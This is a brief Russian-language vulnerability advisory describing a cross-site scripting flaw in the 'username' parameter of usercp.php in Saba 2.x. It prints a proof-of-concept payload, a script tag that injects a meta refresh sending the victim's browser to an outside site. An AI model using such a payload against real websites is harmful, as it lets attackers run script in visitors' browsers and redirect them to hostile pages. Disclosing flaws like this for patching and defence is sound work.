Программа: Saba 2.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "username" сценарием usercp.php. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.

Эксплоит:

<script> document.write(‘<meta http-equiv="refresh" content="0; url=http://Aria-Security.com/index.html">’);
</script>



Оставить мнение